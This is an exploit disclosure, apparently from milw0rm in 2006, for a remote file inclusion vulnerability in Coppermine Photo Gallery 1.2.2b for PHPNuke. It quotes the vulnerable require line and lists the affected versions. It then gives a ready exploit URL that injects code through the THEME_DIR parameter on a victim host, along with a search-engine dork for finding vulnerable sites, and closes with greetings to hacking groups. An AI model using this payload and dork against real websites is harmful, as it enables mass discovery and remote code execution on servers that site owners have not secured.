-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
Coppermine Photo Gallery v1.2.2b for PHPNUKE (THEME_DIR) Remote File Include
Vulnerability
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
Author:Dr Max Virus
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
Level:Dangerous
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
Affected Versions:
1.0 RC3
1.1 beta 2
1.1 .0
1.2
1.2.1
1.2.2 b
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
Code in: themes.php
Vul code:Vul code:require($THEME_DIR."/user_list_info_box.inc");
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
Exploit
victim.com/modules/coppermine/themes/default/theme.php?THEME_DIR=evill code
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
dork: Powered By Coppermine Photo Gallery v1.2.2b /Powered By Coppermine
Photo Gallery v1.2.1
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
Greetz:str0ke-Thehacker-AsianEagle-Nukedx-NETTOXIC-All Ayyildiz Team
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------

# milw0rm.com [2006-09-15]